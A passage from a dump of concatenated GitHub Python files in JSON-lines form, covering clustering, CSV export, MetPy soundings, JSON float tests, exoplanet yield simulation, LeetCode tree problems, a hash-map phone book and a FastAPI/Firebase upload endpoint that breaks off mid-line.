np.copy(linshi_XN3_train[ind_1,:]) \r\n pre_affi_graph3 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph3 = np.matmul(np.matmul(index_matrix,pre_affi_graph3),np.transpose(index_matrix)) \r\n\r\n iv = 4\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = np.copy(linshi_XN4_train[ind_1,:]) \r\n pre_affi_graph4 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph4 = np.matmul(np.matmul(index_matrix,pre_affi_graph4),np.transpose(index_matrix)) \r\n \r\n del ind_1,ind_0,X_kc,index_matrix,linshi_XN0_train,linshi_XN1_train,linshi_XN2_train,linshi_XN3_train,linshi_XN4_train\r\n \r\n X0 = torch.Tensor(X0).to(device)\r\n X1 = torch.Tensor(X1).to(device)\r\n X2 = torch.Tensor(X2).to(device)\r\n X3 = torch.Tensor(X3).to(device)\r\n X4 = torch.Tensor(X4).to(device)\r\n WE = torch.Tensor(WE).to(device)\r\n \r\n args.n_input = 
[X0.shape[1],X1.shape[1],X2.shape[1],X3.shape[1],X4.shape[1]]\r\n \r\n args.lrae = 0.01\r\n args.momentumae = 0.95\r\n args.gammaae = 0.001\r\n args.lrkl = 0.0001\r\n args.gammakl = 0.001\r\n args.maxKL_epoach = 7 \r\n args.maxiter = 100\r\n args.aeproches = 500 \r\n args.pretrain_flag = 1\r\n args.pretrain_path = args.basis_pretrain_path+'_'+str(ff)+'_0.'+str(args.percentDel)+'_aelr_'+str(args.lrae)+'_aeproches_'+str(args.aeproches)+'_pretrained_model'+'.pkl'\r\n\r\n# args.pretrain_flag = 0\r\n# args.pretrain_path = args.basis_pretrain_path+'_'+str(ff)+'_aelr_'+str(args.lrae)+'_aeproches_'+str(args.aeproches)+'.pkl'\r\n # SGD parameter\r\n\r\n print(args)\r\n y_pred = train_idec()\r\n \r\n acc_ite_lin = cluster_acc(y, y_pred)*100\r\n nmi_ite_lin = nmi_score(y, y_pred)*100\r\n pur_ite_lin = idecutils.purity_score(y,y_pred)*100\r\n\r\n \r\n \r\n\r\n","repo_name":"DarrenZZhang/CDIMC-Net","sub_path":"CDIMC-net-handwritten_final.py","file_name":"CDIMC-net-handwritten_final.py","file_ext":"py","file_size_in_byte":30510,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"30643332356","text":"#Export data from API to csv file\nimport csv \nimport json \nimport requests\nimport sys\n\nif len(sys.argv) != 2:\n print(\"Usage: .\\import.py destination.csv\")\n sys.exit(2)\n \ndestination = sys.argv[1]\n\nAPI_ENDPOINT = \"http://127.0.0.1:5000/api/users\"\n\n#Get all users\nr = requests.get(url = API_ENDPOINT)\njson_data = r.json()\n\nusers_data = json_data[\"users\"]\n\ndata_file = open(destination, 'w', newline='')\ncsv_writer = csv.writer(data_file)\n\n#Counter for header\ncount = 0\n \nfor user in users_data:\n\n #Remove ids\n if 'id' in user:\n del user['id']\n\n #Add header\n if count == 0:\n header = user.keys()\n csv_writer.writerow(header)\n count += 1\n \n #Add user data to csv\n csv_writer.writerow(user.values())\n \ndata_file.close()","repo_name":"utc99/apiv1","sub_path":"bulkdata/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29546358427","text":"from datetime import datetime\n\nimport matplotlib.pyplot as plt\n\nimport metpy.calc as mpcalc\nfrom metpy.io import get_upper_air_data\nfrom metpy.plots import SkewT\nfrom metpy.units import units\nimport numpy as np\nfrom metpy.constants import kappa\nget_ipython().magic('matplotlib inline')\n\n# Download and parse the data\ndataset = get_upper_air_data(datetime(1999, 5, 4, 0), 'OUN', retry_delay=1000)\n\np = dataset.variables['pressure'][:]\nT = dataset.variables['temperature'][:]\nTd = dataset.variables['dewpoint'][:]\nu = dataset.variables['u_wind'][:]\nv = dataset.variables['v_wind'][:]\n\ndef mixed_layer(p, T, Td, depth=100*units.hPa, starting_pressure=p[0]):\n \n bottom_pressure = p[0]\n top_pressure = p[0] - depth\n \n inds = (p <= bottom_pressure) & (p >= top_pressure)\n p_interp = p[inds]\n print(p_interp)\n p_interp = np.sort(np.append(p_interp, top_pressure)) * units.hPa\n sort_args = np.argsort(p)\n T = np.interp(p_interp, p[sort_args], T[sort_args]) * units.degC\n Td = np.interp(p_interp, p[sort_args], Td[sort_args]) * units.degC\n p = p_interp\n \n theta = mpcalc.potential_temperature(p, T)\n \n mixing_ratio = mpcalc.saturation_mixing_ratio(p, Td)\n plt.plot(p, theta)\n \n actual_depth = p[-1] - p[0]\n theta_mean = (1./actual_depth.m) * np.trapz(theta, p) * units.kelvin\n mixing_ratio_mean = (1./actual_depth.m) * np.trapz(mixing_ratio, 
p)\n vapor_pressure_mean = mpcalc.vapor_pressure(starting_pressure, mixing_ratio_mean)\n \n dewpoint_mean = mpcalc.dewpoint(vapor_pressure_mean)\n temperature_mean = theta_mean / mpcalc.potential_temperature(starting_pressure, 1*units.degK).m\n return starting_pressure, temperature_mean.to('degC'), dewpoint_mean\n\nprint(mixed_layer(p, T, Td))\n\nmpcalc.virtual_temperature(1 * units.degC, 0.01229)\n\nmpcalc.potential_temperature(959*units.hPa, 20 * units.degC)\n\n\n\nmpcalc.potential_temperature(959*units.hPa, 275*units.degK)\n\n278.30809 /( (1000 / 959)**kappa)\n\n278.30809/ mpcalc.potential_temperature(959*units.hPa, 1*units.degK)\n\n(300*units.degK).to('degC')\n\nfig = plt.figure(figsize=(9, 9))\nskew = SkewT(fig, rotation=45)\n\n# Plot the data using normal plotting functions, in this case using\n# log scaling in Y, as dictated by the typical meteorological plot\nskew.plot(p, T, 'r')\nskew.plot(p, Td, 'g')\nskew.plot_barbs(p, u, v)\nskew.ax.set_ylim(1000, 100)\nskew.ax.set_xlim(-40, 60)\n\n# Calculate LCL height and plot as black dot\nlcl_pressure, lcl_temperature = mpcalc.lcl(p[0], T[0], Td[0])\nskew.plot(lcl_pressure, lcl_temperature, 'ko', markerfacecolor='black')\n\n# Calculate full parcel profile and add to plot as black line\nprof = mpcalc.parcel_profile(p, T[0], Td[0]).to('degC')\nskew.plot(p, prof, 'k', linewidth=2)\n\n# Example of coloring area between profiles\ngreater = T >= prof\nskew.ax.fill_betweenx(p, T, prof, where=greater, facecolor='blue', alpha=0.4)\nskew.ax.fill_betweenx(p, T, prof, where=~greater, facecolor='red', alpha=0.4)\n\n# An example of a slanted line at constant T -- in this case the 0\n# isotherm\nskew.ax.axvline(0, color='c', linestyle='--', linewidth=2)\n\n# Add the relevant special lines\nskew.plot_dry_adiabats()\nskew.plot_moist_adiabats()\nskew.plot_mixing_lines()\n\n# Show the plot\nplt.show()\n\nx = [860,960]\ny = [302, 299]\nprint(np.polyfit(x, y, 1))\n\ndef integ(x):\n return -0.015*x*x+327.8*x\n\ninteg(960)-integ(860)\n\nnp.trapz([302,299], [860,960])\n\npint = [959,931.3,925.,899.3,892.,867.9]\ntint = [298.90289633,299.37465065,299.54662685,300.52407484,300.81124879,302.54903507]\nnp.trapz(tint[::-1], pint[::-1])\n\nplt.plot(pint, tint, marker='o')\n\n27349.019918277005/(959-867.9)\n\na= np.array([1,2,3])\n\na\n\nnp.append(a, [4])\n\np.dimensionality\n\np.dimensionality == {'[length]': -1.0, '[mass]': 1.0, '[time]': -2.0}\n\nleng = 1 * units.m\n\nleng\n\nleng.dimensionality \n\nleng.units\n\nfrom time import sleep\n\nfor i in range(10):\n print(i)\n dataset = get_upper_air_data(datetime(1999, 5, 4, 0), 'OUN', retry_delay=1000)\n #sleep(0.01)\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/Mixed Layer.py","file_name":"Mixed Layer.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25624938141","text":"import decimal\nimport json as py_json\nimport math\nimport platform\n\nimport pytest\nfrom yapic import json as yapic_json\n\nIS32BIT = platform.architecture()[0] == \"32bit\"\n\nCASES = [\n (1.1, \"1.1\"),\n (-1.1, \"-1.1\"),\n (3.14159265359, \"3.14159265359\"),\n (1e100, \"1e+100\"),\n (1e-100, \"1e-100\"),\n (float(\"nan\"), \"NaN\"),\n (float(\"infinity\"), \"Infinity\"),\n (float(\"-infinity\"), \"-Infinity\"),\n]\n\n# rounding error on 32bit machine\nif not IS32BIT:\n CASES.append((89255.0 / 1e22, \"8.9255e-18\"))\n\n\n@pytest.mark.parametrize(\"value,expected\", CASES)\ndef test_float_encode(value, expected, 
ensure_ascii):\n assert yapic_json.dumps(value, ensure_ascii=ensure_ascii) == expected\n assert yapic_json.dumpb(value, ensure_ascii=ensure_ascii) == expected.encode(\"utf-8\")\n\n\n@pytest.mark.parametrize(\"expected,value\", CASES)\ndef test_float_decode(value, expected, number_input_type):\n if math.isnan(expected):\n assert math.isnan(yapic_json.loads(value))\n else:\n value = number_input_type(value)\n assert yapic_json.loads(value) == py_json.loads(value)\n\n\n@pytest.mark.parametrize(\n \"value\",\n [\n \"12345.34e23\",\n \"12345.34e-2300\",\n \"12345e+2300\",\n \"12345e-2300\",\n \"1.0001\",\n \"-0.0001\",\n \"1.0001e2\",\n \"31415.926535897932\",\n \"[31415.926535897932,314159.26535897932]\",\n \"0.0001e2\",\n \"0.1\",\n \"0.0000\",\n \"[0,0.0]\",\n \"1.00e2\",\n \"0e-2\",\n \"0E-7\",\n ],\n)\ndef test_float_decode2(value, number_input_type):\n value = number_input_type(value)\n assert yapic_json.loads(value) == py_json.loads(value)\n\n\n@pytest.mark.parametrize(\"expected,value\", CASES)\ndef test_float_parse_hook(value, expected, number_input_type):\n if not math.isnan(expected):\n value = number_input_type(value)\n assert yapic_json.loads(value, parse_float=decimal.Decimal) == py_json.loads(value, parse_float=decimal.Decimal)\n","repo_name":"zozzz/yapic.json","sub_path":"tests/test_float.py","file_name":"test_float.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"38"} +{"seq_id":"18973775946","text":"from psisim import telescope,instrument,observation,spectrum,universe,plots\nimport numpy as np\nimport matplotlib.pylab as plt\nimport copy\nimport time\nimport astropy.units as u\nimport os\nimport psisim\n\npsisim_path = os.path.dirname(psisim.__file__)\n\ntmt = telescope.TMT()\npsi_red = instrument.PSI_Red()\npsi_red.set_observing_mode(3600,2,'M',10, np.linspace(4.2,4.8,3)*u.micron) #3600s, 2 exposures,M-band, R of 10\n\n######################################\n######## Generate the universe #######\n######################################\n\nexosims_config_filename = psisim_path+\"/../Tutorials/forBruceandDimitri_EXOCAT1.json\" #Some filename here\nuni = universe.ExoSims_Universe(exosims_config_filename)\nuni.simulate_EXOSIMS_Universe()\n\n##############################\n######## Lots of setup #######\n##############################\n\nmin_iwa = np.min(psi_red.current_wvs).to(u.m)/tmt.diameter*u.rad\nplanet_table = uni.planets\n# planet_table = planet_table[np.where(planet_table['PlanetMass'] > 10)]\nplanet_table = planet_table[planet_table['AngSep'] > min_iwa.to(u.mas)]\nplanet_table = planet_table[planet_table['Flux Ratio'] > 1e-10]\n\nn_planets = len(planet_table)\n\nplanet_types = []\nplanet_spectra = [] #The spectrum from the cooling tracks\nplanet_eq_spectra = [] #The spectrum from the equilibrium thermal emission\nplanet_ages = []\n\nn_planets_now = n_planets\nrand_planets = np.random.randint(0, n_planets, n_planets_now)\n\n########### Model spectrum wavelength choice #############\n# We're going to generate a model spectrum at a resolution twice the \n# requested resolution\nintermediate_R = psi_red.current_R*2\n#Choose the model wavelength range to be just a little bigger than \n#the observation wavelengths\nmodel_wv_low = 0.9*np.min(psi_red.current_wvs) \nmodel_wv_high = 1.1*np.max(psi_red.current_wvs)\n\n#Figure out a good wavelength spacing for the model\nwv_c = 0.5*(model_wv_low+model_wv_high) #Central wavelength of the model\ndwv_c = wv_c/intermediate_R #The delta_lambda at 
the central wavelength\n#The number of wavelengths to generate. Divide by two for nyquist in the d_wv. \n#Multiply the final number by 2 just to be safe.\nn_model_wv = int((model_wv_high-model_wv_low)/(dwv_c/2))*2\n#Generate the model wavelenths\nmodel_wvs = np.linspace(model_wv_low, model_wv_high, n_model_wv) #Choose some wavelengths\n\n#Let's assume we're doing the AO sensing in I-band: \nplanet_table['StarAOmag'] = planet_table['StarImag']\n\n#####################################\n######## Generate the Spectra #######\n#####################################\n\nprint(\"\\n Starting to generate planet spectra\")\nfor planet in planet_table[rand_planets]:\n #INSERT PLANET SELECTION RULES HERE\n\n if planet['PlanetMass'] < 10:\n #If the planet is < 10 M_Earth, we don't trust bex. So we'll be pessimistic and just report its thermal equilibrium. \n planet_type = \"blackbody\"\n planet_types.append(planet_type)\n\n #The bond albedo\n atmospheric_parameters = 0.5\n planet_spectrum = spectrum.simulate_spectrum(planet, model_wvs, intermediate_R, atmospheric_parameters, package='blackbody')\n planet_spectra.append(planet_spectrum)\n planet_eq_spectra.append(planet_spectrum)\n\n else:\n planet_type = \"Gas\"\n planet_types.append(planet_type)\n\n age = np.random.random() * 5e9 # between 0 and 5 Gyr\n planet_ages.append(age)\n\n time1 = time.time()\n\n ### Here we're going to generate the spectrum as the addition of cooling models and a blackbody (i.e. equilibrium Temperature)\n \t## Generate the spectrum from cooling models and downsample to intermediate resolution\n atmospheric_parameters = age, 'M', True\n planet_spectrum = spectrum.simulate_spectrum(planet, model_wvs, intermediate_R, atmospheric_parameters, package='bex-cooling')\n\n ## Generate the spectrum from a blackbody\n atmospheric_parameters = 0.5#The bond albedo\n planet_eq_spectrum = np.array(spectrum.simulate_spectrum(planet, model_wvs, intermediate_R, atmospheric_parameters, package='blackbody'))\n \n planet_spectra.append(planet_spectrum)\n planet_eq_spectra.append(planet_eq_spectrum)\n \n time2 = time.time()\n print('Spectrum took {0:.3f} s'.format((time2-time1)))\n\nprint(\"Done generating planet spectra\")\nprint(\"\\n Starting to simulate observations\")\n\n#Here we take the biggest of either the planet cooling spectrum or the planet equilibrium spectrum\n#Kind of hacky, but is a good start\nfinal_spectra = np.array(copy.deepcopy(planet_spectra))\nplanet_eq_spectra = np.array(planet_eq_spectra)\nplanet_spectra = np.array(planet_spectra)\nfinal_spectra[planet_eq_spectra > planet_spectra] = planet_eq_spectra[planet_eq_spectra > planet_spectra]\n\n\n##########################################\n######## Simulate the observations #######\n##########################################\n\npost_processing_gain=10\nsim_F_lambda, sim_F_lambda_errs,sim_F_lambda_stellar, noise_components = observation.simulate_observation_set(tmt, psi_red,\n\tplanet_table[rand_planets], final_spectra, model_wvs, intermediate_R, inject_noise=False,\n\tpost_processing_gain=post_processing_gain,return_noise_components=True)\n\nspeckle_noises = np.array([s[0] for s in noise_components])\nphoton_noises = np.array([s[3] for s in noise_components])\n\nflux_ratios = sim_F_lambda/sim_F_lambda_stellar\ndetection_limits = sim_F_lambda_errs/sim_F_lambda_stellar\nsnrs = sim_F_lambda/sim_F_lambda_errs\n\ndetected = psi_red.detect_planets(planet_table[rand_planets],snrs,tmt)\n\n\n########################################\n######## Make the contrast Plot 
########\n########################################\n\n#Choose which wavelength you want to plot the detections at:\nwv_index = 1\n\nfig, ax = plots.plot_detected_planet_contrasts(planet_table[rand_planets],wv_index,\n detected,flux_ratios,psi_red,tmt,ymin=1e-8, ymax=1e-1,show=False)\n\n#The user can now adjust the plot as they see fit. \n#e.g. Annotate the plot\n# ax.text(4e-2,1e-5,\"Planets detected: {}\".format(len(np.where(detected[:,wv_index])[0])),color='k')\n# ax.text(4e-2,0.5e-5,\"Planets not detected: {}\".format(len(np.where(~detected[:,wv_index])[0])),color='k')\n# ax.text(4e-2,0.25e-5,\"Post-processing gain: {}\".format(post_processing_gain),color='k')\nprint(\"Planets detected: {}\".format(len(np.where(detected[:,wv_index])[0])))\nprint(\"Planets not detected: {}\".format(len(np.where(~detected[:,wv_index])[0])))\nprint(\"Post-processing gain: {}\".format(post_processing_gain))\nplt.show()\n\n########################################\n######## Make the magnitude Plot #######\n########################################\n\n## Choose which wavelength you want to plot the detections at:\n# wv_index = 1\n\n# fig, ax = plots.plot_detected_planet_magnitudes(planet_table[rand_planets],wv_index,\n# detected,flux_ratios,psi_red,tmt,show=False)\n\n# #The user can now adjust the plot as they see fit. \n# #e.g. Annotate the plot\n# # ax.text(4e-2,1e-5,\"Planets detected: {}\".format(len(np.where(detected[:,wv_index])[0])),color='k')\n# # ax.text(4e-2,0.5e-5,\"Planets not detected: {}\".format(len(np.where(~detected[:,wv_index])[0])),color='k')\n# # ax.text(4e-2,0.25e-5,\"Post-processing gain: {}\".format(post_processing_gain),color='k')\n# print(\"Planets detected: {}\".format(len(np.where(detected[:,wv_index])[0])))\n# print(\"Planets not detected: {}\".format(len(np.where(~detected[:,wv_index])[0])))\n# print(\"Post-processing gain: {}\".format(post_processing_gain))\n# plt.show()\n\n###########################################\n######## Recalculate the magnitudes #######\n###########################################\n\n\n# dMags = -2.5*np.log10(flux_ratios[:,wv_index]) \n\n# band = psi_red.current_filter\n# if band == 'R':\n# bexlabel = 'CousinsR'\n# starlabel = 'StarRmag'\n# elif band == 'I':\n# bexlabel = 'CousinsI'\n# starlabel = 'StarImag'\n# elif band == 'J':\n# bexlabel = 'SPHEREJ'\n# starlabel = 'StarJmag'\n# elif band == 'H':\n# bexlabel = 'SPHEREH'\n# starlabel = 'StarHmag'\n# elif band == 'K':\n# bexlabel = 'SPHEREKs'\n# starlabel = 'StarKmag'\n# elif band == 'L':\n# bexlabel = 'NACOLp'\n# starlabel = 'StarKmag'\n# elif band == 'M':\n# bexlabel = 'NACOMp'\n# starlabel = 'StarKmag'\n# else:\n# raise ValueError(\"Band needs to be 'R', 'I', 'J', 'H', 'K', 'L', 'M'. 
Got {0}.\".format(band))\n\n# stellar_mags = planet_table[starlabel]\n# stellar_mags = np.array(stellar_mags)\n\n# planet_mag = stellar_mags+dMags\n\n# plt.figure()\n# plt.plot(planet_mag,np.log10(masses),'o',alpha=0.3) \n# plt.xlabel(\"M-band Magnitude\")\n# plt.ylabel(\"Log10(Mass)\")\n# plt.show()\n\n# plt.figure()\n# plt.plot(np.log10(flux_ratios[:,wv_index]),np.log10(masses),'o',alpha=0.3) \n# plt.xlabel(\"log10(Flux Ratios\")\n# plt.ylabel(\"Log10(Mass)\")\n# plt.show()\n\n# sim_F_lambda\n\n# plt.figure()\n# plt.plot((sim_F_lambda[:,wv_index]),np.log10(masses),'o',alpha=0.3) \n# plt.xlabel(\"log10(sim_F_lambda)\")\n# plt.ylabel(\"Log10(Mass)\")\n# plt.xlim(0,1e8)\n# plt.show()\n\n\n############################################################\n######## Histogram of detections and non-detections ########\n############################################################\n\n### And now we'll make a simple histogram of detected vs. generated planet mass. \nmasses = [planet['PlanetMass'] for planet in planet_table]\ndetected_masses = [planet['PlanetMass'] for planet in planet_table[detected[:,1]]] #Picking 4.5 micron\n\nbins = np.logspace(np.log10(1),np.log10(1000),20)\nfig,axes = plt.subplots(2,1)\nhist_detected = axes[0].hist(detected_masses,bins=bins,color='darkturquoise',histtype='step',label=\"Detected\",linewidth=3.5)\nhist_all = axes[0].hist(masses,color='k',bins=bins,histtype='step',label=\"Full Sample\",linewidth=3.5)\naxes[0].set_xscale(\"log\")\naxes[0].set_ylabel(\"Number of planets\")\naxes[0].set_xlabel(r\"Planet Mass [$M_{\\oplus}$]\")\naxes[0].legend()\n\nefficiency = hist_detected[0]/hist_all[0]\nefficiency[efficiency!=efficiency]=0\naxes[1].step(np.append(hist_detected[1][0],hist_detected[1]),np.append(0,np.append(efficiency,0)),where='post',linewidth=3)\naxes[1].set_ylabel(\"Detection Efficiency\")\n#Stupid hack\naxes[1].set_xscale(\"log\")\naxes[1].set_xlabel(r\"Planet Mass [$M_{\\oplus}$]\")\nfig.suptitle(r\"Thermal Emission Detections at {:.1f}$\\mu m$\".format(psi_red.current_wvs[1]))\nplt.show()\n\n##################################\n######## Save the results ########\n##################################\n\nfrom astropy.io import fits\nplanet_table[rand_planets].write(\"thermal_planet_table.csv\")\nps_hdu = fits.PrimaryHDU(planet_spectra)\nps_hdu.writeto(\"thermal_planet_spectra.fits\",overwrite=True)\nflux_hdu = fits.PrimaryHDU([sim_F_lambda, sim_F_lambda_errs,np.array(sim_F_lambda_stellar)])\nflux_hdu.writeto(\"thermal_Observation_set.fits\",overwrite=True)\nnoise_components_hdu = fits.PrimaryHDU(noise_components)\nnoise_components_hdu.writeto(\"thermal_noise_components.fits\",overwrite=True)\n\n","repo_name":"planetarysystemsimager/psisim","sub_path":"Tutorials/example_thermal_yield.py","file_name":"example_thermal_yield.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} {"seq_id":"72441744432","text":"# Definition for a binary tree node.\r\nfrom typing import List, Optional\r\n\r\n\r\nclass TreeNode:\r\n    def __init__(self, val=0, left=None, right=None):\r\n        self.val = val\r\n        self.left = left\r\n        self.right = right\r\nclass Solution:\r\n    # Divide-and-conquer approach\r\n    def sortedArrayToBST(self, nums: List[int]) -> Optional[TreeNode]:\r\n        def dfs(nums):\r\n            # exit condition\r\n            if not nums:\r\n                return None\r\n            \r\n            # mid node\r\n            middle = len(nums) // 2\r\n            node = TreeNode(nums[middle])\r\n\r\n            # left\r\n            left = dfs(nums[:middle])\r\n            # right\r\n            right = dfs(nums[middle+1:])\r\n\r\n            node.left = left\r\n            node.right = right \r\n\r\n            return node\r\n\r\n        
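# recursively build a height-balanced BST from the whole sorted array\r\n        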
root = dfs(nums)\r\n\r\n        return root\r\n\r\n    # Build the tree from binary-search midpoints -> the book's solution\r\n    def sortedArrayToBST(self, nums: List[int]) -> Optional[TreeNode]:\r\n        if not nums:\r\n            return None\r\n\r\n        mid = len(nums) // 2\r\n\r\n        # Construct the binary-search-result tree by divide and conquer\r\n        node = TreeNode(nums[mid])\r\n        node.left = self.sortedArrayToBST(nums[:mid])\r\n        node.right = self.sortedArrayToBST(nums[mid+1:])\r\n\r\n        return node\r\n\r\nnums = [-10,-3,0,5,9]\r\nsolution = Solution()\r\nprint(solution.sortedArrayToBST(nums))","repo_name":"dhtmaks2540/LeetCode-Algorithm","sub_path":"algorithm_problems/convert-sorted-array-to-binary-search-tree-2.py","file_name":"convert-sorted-array-to-binary-search-tree-2.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} {"seq_id":"35798448196","text":"import sys\n\n\nclass HashMap:\n    \"\"\" This is a class for the HashMap data structure built on arrays \"\"\"\n    def __init__(self):\n        self.n = None\n        self.query = None\n        self.arguments = None\n        self.PhoneBook = None\n        self.a = 34\n        self.b = 24\n        self.p = 100019\n        self.m = 1000\n        self.hashkey = None\n\n    def read(self):\n        self.n = int(sys.stdin.readline())\n        self.PhoneBook = [{} for _ in range(self.m)]\n        for _ in range(self.n):\n            self.query, *self.arguments = sys.stdin.readline().rstrip('\\n').split(' ')\n            self.hashkey = (((self.a * int(self.arguments[0]))+self.b) % self.p) % self.m\n            if self.query == \"add\":\n                self.add()\n            elif self.query == \"del\":\n                self.delete()\n            elif self.query == \"find\":\n                self.find()\n\n    def add(self):\n        self.PhoneBook[self.hashkey][int(self.arguments[0])] = self.arguments[1]\n\n    def delete(self):\n        if int(self.arguments[0]) in self.PhoneBook[self.hashkey]:\n            del self.PhoneBook[self.hashkey][int(self.arguments[0])]\n\n    def find(self):\n        if int(self.arguments[0]) in self.PhoneBook[self.hashkey]:\n            print(self.PhoneBook[self.hashkey][int(self.arguments[0])])\n        else:\n            print('not found')\n\n\nif __name__ == \"__main__\":\n    phone_book = HashMap()\n    phone_book.read()","repo_name":"rishittripathi-therocking/Data-Structures-And-Algorithm","sub_path":"Data Structures/phone_book.py","file_name":"phone_book.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} {"seq_id":"10749017716","text":"# O(N)\n\ndef maxDepth(self, root: Optional[TreeNode]) -> int: \n    # check if there is no node\n    if root==None:\n        return 0\n    \n    # check if there is 1 node only\n    elif root.right==None and root.left==None:\n        return 1\n    \n    \n    # Compute the depth of each subtree\n    ltree=self.maxDepth(root.left)\n    rtree=self.maxDepth(root.right)\n    \n    # return max height \n    return (max(ltree,rtree)+1)","repo_name":"Sameek18/Striver-DSA-sheet","sub_path":"Day18/Height of a Binary Tree.py","file_name":"Height of a Binary Tree.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} {"seq_id":"72911226031","text":"import os\r\nfrom random import shuffle\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport tensorflow as tf\r\n\r\n# ImageDataGenerator\r\nimg = cv2.imread('ff4e9adb85e0b62f8b80d67891408ed4.origin.jpg')\r\n\r\n\r\ndef random_swap(image_array, swap_size=(5, 7), swap_range=2, step=1):\r\n    assert swap_range < swap_size[0] * swap_size[1]\r\n    H, W, _ = image_array.shape\r\n    h_point = [int(H / swap_size[0]) * i for i in range(swap_size[0] + 1)]\r\n    h_boxs = [h_point[i:i + 2] for i in range(len(h_point) - 1)]\r\n    w_point = [int(W / swap_size[1]) * i for i in 
range(swap_size[1] + 1)]\r\n    w_boxs = [w_point[i:i + 2] for i in range(len(w_point) - 1)]\r\n    boxes = [h_box + w_box for h_box in h_boxs for w_box in w_boxs]\r\n    for i in range(0, len(boxes) - swap_range, step):\r\n        temp = boxes[i:i + swap_range]\r\n        shuffle(temp)\r\n        boxes[i:i + swap_range] = temp\r\n    boxes = [boxes[i * swap_size[1]:(i + 1) * swap_size[1]] for i in range(swap_size[0])]\r\n    img = np.concatenate([np.concatenate([image_array[b[0]:b[1], b[2]:b[3], :] for b in box], axis=1) for box in boxes],\r\n                         axis=0)\r\n    return img\r\n\r\n\r\n# tf.numpy_function executes the wrapped NumPy routine on concrete tensors, so apply it to the image directly;\r\n# random_swap returns uint8 (the dtype cv2.imread produces), hence Tout=tf.uint8.\r\nimg_aug = tf.numpy_function(random_swap, inp=[img], Tout=tf.uint8)","repo_name":"gfanqi/DCL_tensorflow2","sub_path":"do_some_experiment.py","file_name":"do_some_experiment.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} {"seq_id":"10363524414","text":"from pathlib import Path\nfrom fastapi import FastAPI, HTTPException, UploadFile, Form\nfrom fastapi.responses import JSONResponse\nimport firebase_admin\nfrom firebase_admin import credentials, initialize_app, storage\nfrom google.cloud import firestore\nfrom datetime import datetime, timedelta, timezone\nimport os\nfrom utils import connect, open_worksheet, append_data\nfrom fastapi.routing import APIRouter\nfrom models.events import WorkshopRegistrationRequest, NonWorkshopRegistrationRequest, FileTypeEnum\nfrom models.admin import CategoryEnum, ClassEnum\nfrom dotenv import load_dotenv, dotenv_values\n\nload_dotenv()\nconfig = dotenv_values(\".env\")\nspreadsheet_name = config[\"SPREADSHEET_NAME\"]\naccess_code1 = config[\"ACCESS_CODE1\"]\naccess_code2 = config[\"ACCESS_CODE2\"]\naccess_code3 = config[\"ACCESS_CODE3\"]\n\n# Create a list of access codes\nallowed_access_codes = [access_code1, access_code2, access_code3]\n\n# Create the FastAPI app\napp = FastAPI()\n\n# Create the event_router\nevent_router = APIRouter(tags=[\"Registration\"])\nadmin_router = APIRouter(tags=[\"Admin\"])\nasset_router = APIRouter(tags=[\"Assets\"])\n\nCREDENTIAL_PATH = \"sa.json\"\nBUCKET_NAME = \"icee24\"\n\ncred = credentials.Certificate(CREDENTIAL_PATH)\ninitialize_app(cred)\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = CREDENTIAL_PATH\n\nfirebase_storage = storage.bucket(name=BUCKET_NAME)\ndb = firestore.Client()\n\n@event_router.post(\"/upload-file\")\nasync def upload_file(file: UploadFile, type: FileTypeEnum):\n    allowed_formats = {'pdf': 'application/pdf', 'jpeg': 'image/jpeg', 'jpg': 'image/jpeg', 'png': 'image/png'}\n    max_file_size = 5 * 1024 * 1024  # 5 MB\n\n    try:\n        file_format = file.filename.split('.')[-1].lower()\n        if file_format not in allowed_formats:\n            raise HTTPException(status_code=400, detail=\"Format file tidak didukung\")\n\n        file_size = file.file.seek(0, 2)\n        if file_size > max_file_size:\n            raise HTTPException(status_code=400, detail=\"Ukuran file terlalu besar\")\n\n        file.file.seek(0)\n\n        current_time = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n        new_filename = f\"{current_time}.{file.filename}\"\n\n        # Get the content type based on the file format\n        content_type = allowed_formats[file_format]\n\n        # Construct the destination path with the folder (type) included\n        destination_path = f\"registration/{type}/{new_filename}\"\n\n        blob = firebase_storage.blob(destination_path)  # Use the destination path\n\n        # Set the content type when uploading the file\n        blob.upload_from_file(file.file, content_type=content_type)\n\n        file_url = 
